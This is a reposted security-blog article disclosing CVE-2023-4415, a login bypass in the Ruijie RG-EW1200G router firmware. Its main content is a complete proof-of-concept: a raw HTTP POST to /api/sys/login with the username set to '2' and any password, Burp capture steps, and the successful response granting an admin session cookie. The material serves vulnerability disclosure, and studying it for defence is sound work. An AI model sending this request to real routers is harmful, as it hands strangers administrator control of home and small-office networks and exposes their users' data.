CVE-2023-4415: Ruijie RG-EW1200G Login Bypass, with PoC

admin, 20 August 2023, 14:33:22

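Introduction

The Ruijie Networks RG-EW1200G is a wired and wireless all-gigabit dual-band wireless router, suited to single-floor homes, villas, small shops, SOHO offices and similar settings. Its performance is sufficient for gigabit Internet access; its signal is strong, with signal power tripled and coverage distance nearly doubled.

Vulnerability Description

Ruijie Networks RG-EW1200G HWR_1.0(1)B1P5,Release(07161417) r483 has a login-bypass logic vulnerability that allows any user to obtain device administrator privileges without a password, and so to log in to the router, obtain sensitive information, and control the internal network.

Affected Versions

Affected product: RG-EW1200G wireless router

Affected firmware: HWR_1.0(1)B1P5,Release(07161417) r483

Exploitation

POC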

POST /api/sys/login HTTP/1.1
Host: xxx.xxx.xxx:6060
Content-Length: 59
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: application/x-www-form-urlencoded
Origin: http://xxx.xxx.xxx:6060
Referer: http://xxx.xxx.xxx:6060/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua-platform: "Windows"
sec-ch-ua: "Edge";v="107", "Chromium";v="107", "Not=A?Brand";v="24"
sec-ch-ua-mobile: ?0
Connection: close

{"username":"2","password":"123","timestamp":1692412880000}

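1. Open the RG-EW1200G login page and enter any password.

2. Capture the login request with Burp and change "username" to "2" (the request shown under POC above).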


3. Send the request; the login succeeds.

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 19 Aug 2023 02:41:32 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Set-Cookie: bcrsession=f1d7956e195d123d8f0b4a6670553a7cdf9eb8807947d737eea204b1ae88d5460358d3112d7f66df; Path=/; Max-Age=21600
Content-Length: 83

{"msg":"登入成功","result":"ok","data":{"is_init":false,"dev_mode":"gateway"}}


References

https://nvd.nist.gov/vuln/detail/CVE-2023-4415
https://github.com/blakespire/repoforcve/tree/main/RG-EW1200G-logic


For study and exchange only; do not use for illegal or criminal purposes.


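  • Published on 20 August 2023, 14:33:22
  • When reprinting, please keep the link to this article (CN-SEC中文网: thanks to the original author for the hard work):
    CVE-2023-4415: Ruijie RG-EW1200G Login Bypass, with PoC https://cn-sec.com/archives/1965226.html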